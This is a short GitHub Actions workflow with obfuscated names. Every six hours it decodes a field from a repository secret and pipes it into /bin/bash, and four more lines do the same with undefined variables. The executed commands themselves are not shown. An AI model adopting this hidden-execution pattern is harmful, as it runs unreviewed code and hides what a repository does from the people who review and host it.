name: qudailiyu
on:
  workflow_dispatch:
  schedule:
    - cron: '57 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qudailiyu
        env:
          tjv5: ${{ secrets.tjv5 }}
        run: |
          echo $tjv5 | jq -r .djmyp46 | /bin/bash
          echo $mbfq494 | jq -r .ntm8 | /bin/bash
          echo $ifyxm2 | jq -r .jidv9 | /bin/bash
          echo $gy76809 | jq -r .o654 | /bin/bash
          echo $iich14739 | jq -r .dthk2 | /bin/bash

